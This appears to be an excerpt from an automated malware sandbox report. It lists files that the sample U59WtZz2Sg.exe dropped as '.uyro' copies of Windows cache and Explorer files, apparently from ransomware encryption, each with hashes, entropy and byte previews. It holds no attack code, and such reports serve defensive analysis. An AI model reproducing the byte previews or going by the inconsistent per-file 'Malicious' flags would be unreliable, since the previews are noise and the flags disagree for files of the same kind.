SHA-512:	6CE9EDF8DB54AD7EA06ECE34E2C862EFC47F09BF8363B546E2DE833E08B3457E8314DB62FE5BDA24E59DD11C6B73BBF5E3767F6472F3CC64E85F492D64E24363
Malicious:	false
Reputation:	unknown
Preview:	.PNG..N)...c.N....I.3.&....L.....8;..Q.....T,..BZ.+=.v..1.2u^.b...+r....;..W...`....j.@..w5..(`......BJ.,H..k.w..Q<\....\|....)....D...#.#.t...bxfl..m.LX...+.........c1pY....g....s.6.(...K.".d'...M.......p>nKm.^Au.7$.+.6.>..>d ...'.z(H.<x.}.-......."..L....1...U,7.8.c..F.:.@..k..<.n./i+.8......m...:.#v.9..E.$........r..kV%o.4.QWi..s...E..sh-\|..}@...#.CD...7......s..).\|K.Twu5...Cn8Y9..Er6.1}.....a..1Z..`...g.......k....C.D.rSr.7{.On.nH....9.vC^F......(....E.ZXS&....Z...~7.p.+:H4.&...?...c.'........h..M@.UNS.gr\|.f.1d....]l.4l.q..N....H..OX.J......5v...&...W....r.a.5.@..Wlx6i[.y..Z.r...r#vU.....@..+V.$7h.X...<....F].....p...R....^.Ua..L......\|>..X0km..a..qo8..)....9e..q.....b>..,.....B...P?.n.(7.#. .A..]..........V.,.@...X..=.B..F....k.u...+.+V.+~..e.j.{..6Y)..-O.G....3... ,~..g.`.t.~&[...l..S.3.4.tO.......7@...`....g.......@\......M...j........2u...My...h.1TN..z.3a....g1...M7...$.Lj...2.B...Q9"sZ...l..Mm5n....A<.,....(

C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.1.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9888760477778975
Encrypted:	false
SSDEEP:	384:EknWdz/Dk8RiEniFJMhkxwlqEGJuxdVA5NwVE2jf:EkWdD1RvniYQwCUx/0wqE
MD5:	D204054E8D0AA42A766C6DC44F32BF96
SHA1:	16F550CD66D1E2D0BC700D8243034002117B8BA1
SHA-256:	BBC85EC37C4E2D12473A0C03EE7088F565D66355A7D441EEA4B6087A7B16D751
SHA-512:	60B339B388F6445B02C6365457CE5B2A667E14507FDB53D6B05F67534D5952ADA76AD59BAE757ED19F972C9FB87351786DBAAE50EAB26101E30EBD5CB7F76268
Malicious:	false
Reputation:	unknown
Preview:	.... .pl......?.k.......4a7..(#c.Q.}..'5A/..['J...u..~..U....-..X.oM..8...0........O.A.97.n5.D..@....#W..tD...f..6j...$w.>.......?!....5n.9....e...>....}h.[.sS.....wo2!..i.J.)k.c..vt........M..]>L.e.!.@4.).@..\.I..vh..l..K..Y.....g4..2..nG..3r@C..S/.#....`..,.86k.nNB.Z.e.@o..].I..r$.......X..z6p..F..o..S.1Wf....j@5^...Q.W...4.y..4-)YZ...\|.~..;(.....<..Cv.4..vkb.2.........U`..Y.-..h..'.z.....'...O.\|.y.._.-.,2...W.e.u....\|.....6....c...p.>.i./ RH.U.lJ.Fo...sJ..{&}..jUH.........-m8u;...s.qK....V...@G...8~N...,T...hr.....@h<............i....$.V.O.c....k...[4./.".c.....^.....V:..X...r{.....l....&.g..:.<#..C...u.....a..D....0.)4.b.W...t(.j'8'et...`...`..)y`7.[.6. ....b+.'..X.:.;^...~_.....ilnC...=...n..........q.7..l.....W.>w...@".\..h....I.E w...XD`..Q...f..w!....e...B...j.K...Z=...(9.a..N......L..cz.....N....P...E.A5I..... SB..'D.....O.....1....}.zw\|k&.j...\...........(.........*?..h.4w..._k.....,x.Q..4.tkR.........Q./X...W...h ........dvBM.t

C:\Users\user\Local Settings\Microsoft\Windows\Caches\cversions.3.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9899360186716715
Encrypted:	false
SSDEEP:	384:QcvMSm4ViuzOzW6UL/YxatE8G22lyx6nEYuyA5UySQ+Q6i:QcW4VKzW6UL/Yx2BX2wx6naLl6i
MD5:	24BDC8F8B20B6A4DB3383F0D4A736E7A
SHA1:	B885D954E16F90AC43A263FFD56946078C52F139
SHA-256:	4BC847DC336FDD38239904B8253CEBBBD4D163E9E8C3959457ED1D812A4198D4
SHA-512:	73770E6DC1A3A2028463ECB641E3F13984347A0E3CD774C316F3011FE2A0DAE655FED99B2BCE1C5D2DFB81AF8AED46FA733A2C1D904D30DB42756FBC5013B43B
Malicious:	false
Reputation:	unknown
Preview:	....`.<.;.cl.H..:Ul..@.G...}.......j......_.m....W..Q..;..\|Z..2......E.:K.-.d2'.,5X....s......_.....+..z...B%.g.......a..l;.m..u...HF.)...X!...o;s8C,)k.y.B....b..3...B..P..;Q.P..#Z..Y.{K..).s..;<..vp.o....i..j2l.;.\|.fl2K.J..... .lK.^....].............c.1l..c.._.cx...JJ......s.y.g.B%X...5..D....&...&.S.....9.i.7.>D1..D..k.=-.o.4.a}.H.p.b.1a...fv..P..C"..v.}._.kI.Y...."..O.Z5Yf._...j..j..sK..A$.t......U)+.j...vVf..\{.......1s...i..g.w.z...he.?&...B..8s.d.kw.3J-.x.x.Hf.A......t.....~.G...z.o....(0.Q0.........0.Y..a&.8.....i(9../....R.d....\0vC.'..D.3.m.L..')C.v9..Z{r%..6...).<..E...L}.mOu.+.a..e...9..h.X...Z..:.~d..0....}..y@z`.DG.a.6g.i.Z9.RT?k.....!....U&lu...h?.^..+TK.P..cF,.}[.q....^8ES`....C......s._qx....@i.K.[..y..y;Y.`.y..P.P$..d\.7.D.f..WR..P2...Z..I,.d1.#.^..?.G(._2/2B....g..^.S9..........%U.&.g.(..T..p.w..t4!...,..P...z +.N..7...JkC....r.....5..$;.....O.....Hf..q..=.$Rw.p+.F.1.o.\|........<.\|.\...`..f..%~E...WF..[.3.A=...../....(.

C:\Users\user\Local Settings\Microsoft\Windows\Caches\{0A0496DA-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	419734
Entropy (8bit):	6.3341112064882195
Encrypted:	false
SSDEEP:	6144:hJWtHBwqbak01gnPE/8kbZmQjli+z4b8ahQdcFFcWAF3niI+oA0O:+HHak01gMUkbRjli+wOcFFcW43iobO
MD5:	7A0A1E00BCA7241782820774C4411F78
SHA1:	6B845CDA1F117A225DE2ED7013C14BC0B7719C16
SHA-256:	E53CCCAFB0609BA523D4E86148491C9BB41F28DF303F7FEFF90F811A9A9552F5
SHA-512:	920636AB19F3C4AF0C0215D278E0DC36D2DDE0090F29E97A22AC4F2E588A6205B28F10F2C61A6AFD31EA535950B2D69B3201FC569AB9EF9D2703D874FBA6B402
Malicious:	false
Reputation:	unknown
Preview:	%f.. ...G..0...<.LE....c...w3.r.j..A..d.M.3...:uS...G...3E..skf.A...Z(........sY.JF....?D.<..n.S.Z&..'fv.....3fh.8f....\|8........K...m.ZB.......{~..:+.Vl.+..~zq..uCgF.o....E..dWCY.l...K....J%.... JeP..P..a9..0.;...09....C..\..t...x ,...#&....p1/..L;8..{4. .Ch...Xu.5C..._...d....n...E.....N..8u........[.......f.A.. k..+&..g..X...-i..[..}.t>M..ElJ..D".\|..r<.l.xzl.......O..f_.7p(.Y..xcn....\|..y..=....#..X...).RH#. ...Z.v.C.;.........9......R..<...hZ...TW.....&{7..Y.X.~..G..G....!.6.iI...b..Z........\..^U.>....e..92....D.....a....nD.C.gy.C.........W.D...n.........s..=i.l....A.<m..M2.Ml ...z..'..wn..L..D[..%.M;-_P. ...:j.UW....>...VM."3..?..}...QF..~a.8.....v..^.10......+....6..lDq....H..u.6U..c~ .b'`......P\|(.'..s"........j.w..'.Y...{.iv.....s.........O.}......S.}........J.d>u.0?.K.9I;G........k...2....w%.[C...Z.E.......X..Kr..%<..cC.F.L.:2. ....*+.W1$..@.8g.....n..a..y.....p.Cr".../%..1.(j\v..g...$.a74m.D.or.74......6...p.X.....c.NA.v...j.to.

C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	109822
Entropy (8bit):	7.998401839867957
Encrypted:	true
SSDEEP:	3072:jUfS8Glrrhn4QrQYvjZRKCSSbg1p2/63Q/refm/F:wXWrQ2ZRKnSN/d/re8F
MD5:	8C1F92652A3B37EB10ABBB184B257050
SHA1:	48A245DB59CB51A4E1545926C73BD1AF8F867366
SHA-256:	68D06EC48BA4BCECC50C80E8284FDC61E66C216044D4AE084A676A0801C46145
SHA-512:	FDCAEA6346E2A286DD4E9A09DE61FF4B1D6C6E8ECC14F8539739C4AF585CFF68AD67A888D81A336926DCB56DFEF3A805CD51D391C8CC1EFCB20B408A620282FE
Malicious:	true
Reputation:	unknown
Preview:	....h.h.ep........v.....>....\|..]5.."....j.v;S3v/.............jb...^....)T.(.I60...z...7..?.....%...-....@.~s.M..1.......OT.U.(..._DX.W.9.s..AW.iP.x_...}..P...".v.....$... `....;G.ye...n!f..Eji2..B.3.5k".\|PAB..1........L"...y....G.QD....p...e...{'....h..5.../s)Te...K..2v.mj.m.#.(".$.y._...G,E... `..j$C.<Rt......F.l.?..3.9...............t3D.7.Fr.K.......,(.O.o..^....T .Z.Q...?.....agO.......1=..E...[w......5f........q....RI?FLv6+`...F...N.W6S!{ZD.Zd.b..:....ijP..Y..cZeZ~VWj..?.2..8.T...!O.........3..\|....\|."/..Mc8...Fk.... ......&.Y...wU.e..7n.X..$..3..a.....a$J7..nd./..... ELo...C..K.....bI.h/.i.d.......v...:.(.-......9......?X.I...Xx.A...VS...S.^...Ic........l.x6"..g.....l.r2+6...~...l.}..[...H..Q.gM.....F.b...f...$x\|]QX..6.7..\|....k..A^..@E...u..q.K.).NF.fB4..;.7.>...=.\|t....C?..!......0..~zE....A..[.-....}...I...x.......5&bZ..o ..'`..(.........v...C.R...Z..'.?.{}..];....4 .W.D.G,.<...k...Zm..60.....2..j.w..........>.

C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000016.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	105686
Entropy (8bit):	7.998431706610238
Encrypted:	true
SSDEEP:	3072:KpWconEjtHcWKU76lHarcaNtxDHFdOIbZ72:REZ87U+ScaNtxDFdnZ72
MD5:	3CAFF7A171CAB7EA02E5395AF7D4DD68
SHA1:	775D24754094DB17CB79653BB3EE46A9B2B1DC9B
SHA-256:	CBE7705666F94CA9C7CCBE0DB1415A1B0DEBEDBEAD719ADB34A873272DD5BB25
SHA-512:	743DF037A2DA673479D7B6C593922A28A5517A13C053E2C0A479DA04E0D8B681E72F47FBB8F4FFE1A3AE0FED257D4D675C4511A737A3F285C4657DFD97209D82
Malicious:	true
Reputation:	unknown
Preview:	....h....=.^...../...qI...`~..<Bz.w@3..q=r$.t.N.q....;...2...'.7..O.....TMW.f.}.d>.t.2..Wr.FIb.).b.J.,..?j#.P..%..B. ..TJ..6....u.s.D:(.,.i........V.~.....S.G.....+..h..=9.q..=..wk ..u..x}tY..z.V..r.T...8'g.0o."#_(.x."D..w..7.......8.........B.U.c.D.;[.&.3..m....#..>..._.....?{i)..m1@..B.d.Pt..;...<..b...p...,r.H.#.....f2j./..d%.X..m.W.....rJ.g.2.2.....Qm.y...G.Q<.$H....c....k.a....q.rK.PLL..s.d8.p.....'...fd(c..:...@_...dcs .-....m.^..~...u...$.%..k.O.9..U.......L..+wb.{K.....W.A.K..@..I. .... V8.....r..TT.Y2..a....ML.#a.K..M....^.m...l.F.......:.....$[..4...\|!.l....'..4..K...M...FO....V.9..u..1n).DY..Bk......5A.w.d..F~.9OwD....#.=..t.}...9..x@_...6..1.,.......K.s....e.jY~..U.HQ.....Xg..W5jud...f..z[.......KN^m..@V>...e.VQ....-..'].I\|.cq........&...)...2'6...W^.U..R.../...H..lMi....V u../......f..Z..Nf7.O6J.~....6..H.I.i......H....N.m.....].q+.OHs.......R&.-...5.....]..N9e..Vy..6....D..i...P...*....)......$.q..RF.......uC....b8^'N.....J#.1gz

C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000a.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	106102
Entropy (8bit):	7.998213295632806
Encrypted:	true
SSDEEP:	1536:kMb7nzH8YBBVDzegGa0d77ThPOvhrX4oUJnFDBXLTNvrY1r/8nXLltkVStiJmBo0:5bzHD+ThotXvSnFDBX/NEWRtkVSWVW68
MD5:	A685AF1F4C0A939905CB1E62F6091597
SHA1:	C028833DD7A55DA2D31781413A93BABA2BC39A31
SHA-256:	E9D11FFA21FBC4F924F80E097DB7C80E350AA727B3F7050BAF54916F0CBE4577
SHA-512:	CE7AEAF09D085FF792D3F856BBEF7C5A0BA0A018A549261CE4A342B8E35F7DC7C95B1C7DAD11C6FFF40CA87A017B407ADCD463544B2BE99FC0DC6D59B4ACDCC0
Malicious:	true
Reputation:	unknown
Preview:	.....d...l.{...............t....j9X....1_...d....<......AI..c.q...(.Jzp..J....T....R....JJ.'.-.0^..R...E..n.Wx...~..B..?...E_.YC.6....KEI7!T.."0].a..^7.4..J.#..D#.;Rr...0.6"$.Uh..6a....u.E[=..xs#X.!4.k...VxX..u.3..L..Q.0."...b.2._..n.....{g..3.......P.H..I..&......d..\..Uv......$F......K.v......../%.U..v..=wK..8....m...._9.5g."w....'.\.^k.....H..t..\|ax....8=D.f..^..Fl...L..ow...5sp..87EP! ..................S:.0..."..l.C.....+.n.p\|/.LH....3B.^....ZR..\|.Z.j.z.j..9J...e..x,..T.$..k.C..x.....`..2....B.L#............$..K~ah.w..........%...........e.6..#._S.L;s.M"x#...;m]...........p.n..\|rp.qs..D{a..B.)..l.{'G~............0........j...}E...t..!....+D}J...<..6.:.......p6.^F.7.s...\.R.~.R.R.O...a..j...`...v..._."m.+bR......w..9...e.4?..z....Au3.WG...{..CHd.o.I......h.z.\....C.1..?.......~......D.2..1s....4p.q`T..yh.G.....(...Z^.xw.j8[g....!PC{..W..\.._.p..dJ...VB.Y?}....&......f.o......w..z.........~#...... .zML..,..`../.../..........P......).5..[.

C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000b.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	111334
Entropy (8bit):	7.998316189307929
Encrypted:	true
SSDEEP:	3072:8164a5ZxkcCtOVXAQVUBccnQ14Z6B5b/eJb9xQLspqaa:8164I6PtOVDVmHQu6TjebSaa
MD5:	D95D3283CE7C6357536AA560FB5BB317
SHA1:	61E032767070CCD5AA2D2A84E2D5A7EE6508BE58
SHA-256:	5FD6B6CD0CC692541677917E4382009E28B719C4DC719320422FE04B9E865AB3
SHA-512:	7198CA21B0EFC6FEC30DBC4812DBB8BAFF74B54866AA556996AE3E7F2DCF6F49D2DC6C4F7F87E4AF0C01FB51CC1FE5B98B445BCCCB9CA4EC8E1B3EC47FDEE661
Malicious:	true
Reputation:	unknown
Preview:	.....y?.=..H.....t..G.>...w...t..h.JH....L..+........)A...Y.z....G...A.{>+M...EA...P.5uN\...B...s...d.~....X.#...V..l.v.nH.. ).....#.W...t....l..:...(B.'....S9.........w.1..:..j.B...!U.)I9S.o..........]<l.5.....a.$...W,..{...@.....n.&.(.V.Y.rRE..E..mE.:.`...1.c.....@.y..Z].F..or.2..Z?h....2r"C.B.5.S.....#.7..p.9a....yB....8.]..JB..W...O'.tj.2.....Q.............m_.r.).EI..O1.C9a...jW4.p...o...a.B...L....)o......S.x...B...5I.....T.gS?.A.!%.....M/.Af......(.,......k.......?...f.5 wd.%....7.;K.`.bD.`\|.M8....WC....R..1P.S.G8.W...9T...=e1.........:..R...(%.c...6...j.9..\n.>x1......y-.dF..Q..BK..*.......f..t...q........Ff.af{.....zh....lmyO(.2.....}...,8.#4........t0..\|J......u..ZUs..).7......F..AJ.,\.....~.).E....g.`_.X?V>........x#..g#fN..............k.Kgv....A9..pM..'.... ..1y..f..Z...Pc...L..)(^.@o._..6.F.:....".uQ.4.W.y....f............u\|.p..(7$~...6%9.CSXj..?.2N..,..;..".t.&N..Nc..}..#k.@[I.Oh:!.......@._{Hb.9....42.n._a.f..r..z...O/..!X.G.i./.4Z

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog.etl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	459086
Entropy (8bit):	6.025652433148498
Encrypted:	false
SSDEEP:	3072:UIkC1Fr3OzhtMvKOEbVzuX3bJS+f8TedeeQIUSO3C/4Y4MRR6wG8pCYvVE/+OiJY:Xvr+lUKzZcdkosIUS7wYReACY/ewcJd
MD5:	CFD813FAF808A46C443B4C1A4BBBD9EC
SHA1:	06FA63FD5DC562E5D263BC71274B9DF0FCAD04FB
SHA-256:	0CFFD6C30205113DAFC9D621C797EAC1C6C0CD9169CC70457F681F003011054F
SHA-512:	3C28FF132BB0A0761B572BDE407E12CBDA8E24FA2681B13BEE6B2A3315A48A32D609083DB5BC576294C62FF986F42AE385F3CA8919CCF491C79EE73DB568EB45
Malicious:	false
Reputation:	unknown
Preview:	. ...c.&........".4r.H.`...Od.(r.,..$KN...z`8..J.G....)!....W.>Iu[C..H&..8\|m.9.?..3......}:.c..]....6U.....1..Ny6Hb.M.!...kO..0._..U.OSI.Q.x,.z....q.... .r\|.w7..<agcS..6..kT..$...6Z.vC^.L.........o...1.cVM....'m.#.....9.<Z....\|\|..zv^}....O...~p..:..n\|.Z.b...........k0...!.oUO..u...%B.!.FD._.@zg^....-...* _.=..........8I......s.W_.h7J~#.a.......[Y....]N..g.5..w...=..,.../.kA6_....V.k..&...b.u4..h.(...n...i._..)....Uad...K.QB5#......;..s.SW....C3....[......F.c... .3.d....4..h.,S.....d..v....r`bx....j....z.C.A..!...#n.#...'.kq.k.0..;..J....m=(.(..V3?..G...RQ.n......rD?.......(L.PI....=.../.H..?..r..jmZ.Ols...I....}.upP.'g ..g?....\|.P..z.f.{.....(..PP..c..t.... ..uM.....G.n...t.+:.._..^.l....nI...A....N;...&.T.])U.....:0"7...S...`N..:-....v.d#.j......o..})X.......y...EI....liC..AR.....S...#.1N.}..Uae_Z..9Q...fh...jt....C..&.o.....=.?v..&.A...T.....!..UA[...'N....{..(.'x..".......*(..._. K=....K.FE...o{..o...T-Y.s'....S]./...82.S[t......

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	16718
Entropy (8bit):	7.9893531631578085
Encrypted:	false
SSDEEP:	384:bLlH+2EscSumeo9cxblkMAGbDEFHvVzc+rh/XQfMnIkqgnnJjn4znl:/lzumcxJ0YSF9QfsIkxG
MD5:	0CC85B2B88348394355FD0CC2E28F2E3
SHA1:	787019FA454CE16D96452262D3A7D59A71937D7C
SHA-256:	69CFB2E97DD4A40702D0B50B710854A60849ED5F505FEB06E2179EDAB2BADF9B
SHA-512:	5918A007261082BC715AF64E52855DEF8B7A84F4EF2DCBA4FA0148DFF75D9B47139319E4FEF27670B8032FB7FC666DFC00E750FE339238FB3E60830887B0EF72
Malicious:	false
Reputation:	unknown
Preview:	. ...H..b.B..."}Q.....R...$....u. 49..^..d.o...9gx!3T12.3.Z. H'.b.d.....Z...'.Yd..r..s..........J.F.D.Pr..S.P..H.a.^......l.o.X...0V;3............d).....Qr..Uw../...B\|(..-h..B..(8..,.S.Hr}.....P@..R+.6..&........<C.\..]+..FM.&4....n....Z&.zO...T....U......H/.b.\....k...$.\...pM.cN..........~....=G,O.Q/z.h.....a..B..Jz...R.9 Y.!......`F.1.S._2..N...K\|.4. 0....\(.^.5 >..xm.u2{.I4~..94.VY%.Ln7r...1.G$.!..:NW\|..9-.)..@..}K.;.......G.m..z.......}RN..c.Tw......8.q.........\|.kb..S.:"\|!.+../97.c.t..80..$...Q...0r.&.0!W.."3.......8Y....wjQN.o...n.FYu..>..8....y,,f:.a....h..l@! K.v.....?..una.~Z:.C.f..j....r.)..^.v..1w<..0../#DY..U>E....k..........H)5%H.\_.E..3..i,...dQ..1.s....a.;.'.hL7._~P.2.T ..y.h.x.r.JK(....]..OA..K.&.Y..Jj..1ks..G.z..e.3...G.t!...+.....Z...B..7%..r.w..J..f.g.......A:c.E./....7 T..{^.z.......n.X>...]..ke@. .s.1.mY):....P.ec....W.\/.}..1..H...Z......nU.Hu=..!...oJ...n.~qE.C...\\|..b02.o./.....h.a.8...C0+;..(..M.0._..X..f.r..:3..&T.C..

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1280.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.277441703396149
Encrypted:	false
SSDEEP:	6:GAOJLOpwlxNGykyRGx2AvkzeO6+eL2CNADxhA9YxCVe3ysly4GxntHcii96Z:GAOIU2Z7wKkzBeLXAjRgc3loDtcii9a
MD5:	75091598C9251477B76B6D9718860AA1
SHA1:	847055DBC3014D3D1BA280CF4D0BCB13AD16E4F9
SHA-256:	E988494D4EA12A061866E7F0E3657259AAAF2D95B673EDF9F24E6B54050C9C01
SHA-512:	A3BF735B8066F79A491ED7C7A1E43300EABD6ACF76933F04C4196CFCE089128630A8CBD28BF0C799B60D512A3F2FF20AD6C70B8D1B71E0B90107F497E4CB5762
Malicious:	false
Reputation:	unknown
Preview:	CMMM ~o..d....]..B.5...\....n....K.-...*gd.'.Gr...-{...l.....L....w..Z.#...2.`...I.......#.;.L..H...2......Y.HZ..1..f2.o..7...$.71..#9.mIs..>o...y......k[.}...'.B..%&........\..g.f..#.%U...9?...f....a\|.u...B[..t1.8..Rep\|9..,K%..l..e........R"...A...).L?.-.+9.....#K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_1920.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.301617742591828
Encrypted:	false
SSDEEP:	6:iCiqoiSqI93dMEnr3QcsEXxTtzxwgbferD098ZFrOjmGxntHcii96Z:5oiC93dMEUrQTcgLM09EFO1tcii9a
MD5:	829337618D7FA8CFD45521B8985EAC08
SHA1:	C64D0B829AA2F4086B1033433849E0DA6E6D05F5
SHA-256:	A6CA5815CF2C33EB6CB0A9678FCDC63B49B3494ACD0F764FE72103A837617FDA
SHA-512:	AD33107D3CC078E2301FF277AC335E859B56FEFC34914A60B416F89614CF400DD19F53F2610BD5499B205B49814B4D58BFB48CA4D665E59D886D5AD6B12403A5
Malicious:	false
Reputation:	unknown
Preview:	CMMM ..=.'$..aw6........$..a...(;GP...A......b3...I..@...S."2...TQ...\|.Y... ..N#y`..../.....Z...PS}...S.x._.........,....SF.H..G.\...Q.B.W.%t....}...t.$_....7....N.H..Q.K.N.agO.b......A....a.......T...?.......f.:...0...;..)2....k.s..ZF.k2:...fu.CB.e...D.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_2560.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.276216670162218
Encrypted:	false
SSDEEP:	6:f0Du2765WQ/W/26NfkM9ibQRMWAI0GhiG+OGxntHcii96Z:fLjvc9mdqALQiGGtcii9a
MD5:	EE238C06936432B4C03E038150A77159
SHA1:	B2D60C41F893CC0EA90D0B16BB04781432C4F0F9
SHA-256:	FF59C2C1EF0998B7D9AFE4B13B0ABB00AC577536A39E8D2553D6D0CF48FBFF21
SHA-512:	0E009786E8D39378825C99DA9F185C6F7EA2A13516FC7ED333F0709D06AA56AD4C83F0D4C9334462DF8A65F1FE9C6BB681BAFAE07D4F9EE682C0CD8DD7DAA21B
Malicious:	false
Reputation:	unknown
Preview:	CMMM ...r .p.Om..EQ...."1.>.jrr...RR.1m.v9'. ,.c.!..&..`.s..'D.mtx# =..l.B..z.YDa..(us..Uz......q3.jn.\......n..^..p..]U.Gz..%.%.....E].q.y~w)z.J$..)\|4....y;z..a.0j..cI.C.P(...._.yll.]b/...I.i.....7R.......m.~..4....&y..h............OoYD..<..z.Ln....4yj.}._..[.-..*j...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_768.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.279622482868569
Encrypted:	false
SSDEEP:	6:NnGIC2d+BmaHPxzAztc0WTnCQs1UqSnb20GxntHcii96Z:1GIqBmAxzAzSZrCQsy2Htcii9a
MD5:	0EE894642DC09C40457E398237D1B94D
SHA1:	D2B9C73794D7BB0BDB4E4B59E2399C4372A2A390
SHA-256:	2B2A1F8D2475133682A61C4C833F3DA582281CD1380DBFE6137E01E7A1F96729
SHA-512:	F3834B3048B14A2429F464FBC5E0F7467E9FE339C9BC479F2658C8F7FF4947E6F081339D4687A2935C2F0D027991CF3E39B2F5F13F90F837EB5E45D3BDDA9403
Malicious:	false
Reputation:	unknown
Preview:	CMMM m...15F@..a....B.3.E...P-...<.....}b.$.h.. 6.M.g...A......4...o,...\.C%."....nD....!)]..c..<....~.....%.y".....C....Ka.Yq..JJe...8...Pxq.6.....r.N.........8.6...$..s.Vm./..._J.a.Q.k.9...[.<....C..kj...n.......d...[q..#.G...LcZ.[.r"..T.}...u..g:{g(.(!YU...(.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_96.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.291761509636551
Encrypted:	false
SSDEEP:	6:tGClXdfISxf9c4w4KWWHTjOWaQTK6zhBVevSJmA3KvDzDenEShTAiGxntHcii96Z:tGCYgfU4UHLnb8gKvLShctcii9a
MD5:	CEF6EDAF9EFF36F0D94FC03345176D0D
SHA1:	CCD7382BFE779E9F6FD29AAE3A500ADC8CED40CD
SHA-256:	DD6E1A7B70683A0BFBF691AF06D8F2D0E61F1DD93AA582661635A8233729F092
SHA-512:	B2613E2459AFE0BE34CC19AD0BC699ABD18AD005D8834738948CB9FE4C349CA7A88DC14CDE7BE59C5752F43C96CE4EEB3334203CAD3F5633BF1021F8BD91CCA8
Malicious:	false
Reputation:	unknown
Preview:	CMMM 6..@.&.<.~..1..D.U,.mmj..-;..C...2.....V.iM.......Bu}Z...t.f./.)a........!0..v.`..j?..mz.DDTl...0TI.6....:.V.,.8.%Z56.rq..Q.-..0..#!V...b..q..]..C.v.;...df.oB.C..L.b.>e......."q.j..$..w.>Y].\|...I.w......yr..2I......e..D..o...R.E..3.._.!.........m...j_J.]l..(Q-...KK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_custom_stream.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	GeoSwath RDF
Category:	dropped
Size (bytes):	358
Entropy (8bit):	7.267637862601939
Encrypted:	false
SSDEEP:	6:/dBu1eEWBgmmgH2JaxCFR/6UB4kOkNVRqJ1AiGxntHcii96Z:/do+BKgH2Jl/FBSkNVRA1Adtcii9a
MD5:	49EAFDCD533829F985F14E0E0D21E2A1
SHA1:	2AF2B6CD800C5258C4DD9A522518768A5B3038DB
SHA-256:	00A0C72579D47FE2E7FF22D61E4A8EE651532282BFFC71FFEDEC2968A93C0984
SHA-512:	F0D67B531156855397512A4BCB2C818CA7E5ACDFB6D6B4F63583F6CDF36495F533802886F410FFE74F828BDF7F2B5F80FF1BA08CC34C3D1D7BC4805977AC8CE7
Malicious:	false
Reputation:	unknown
Preview:	CMMM .W....N.?h+.#;4.r..P...qYyZOQ......<u.i\......./2..G...3o=....I.2.}...C.?.O.3..._gq....X.......Y-.....3..fcxY.`..Gj6hx..^.P.q9.Q.......f.....L....ttJ.=..K..j...R......4..j...B..~3fo..@...-U$07(.o......#Fr..o....S.[>...;.dp.z.3..7..v.m.,.c...7..}=N..im!.4n@j.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Local Settings\Microsoft\Windows\Explorer\iconcache_exif.db.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
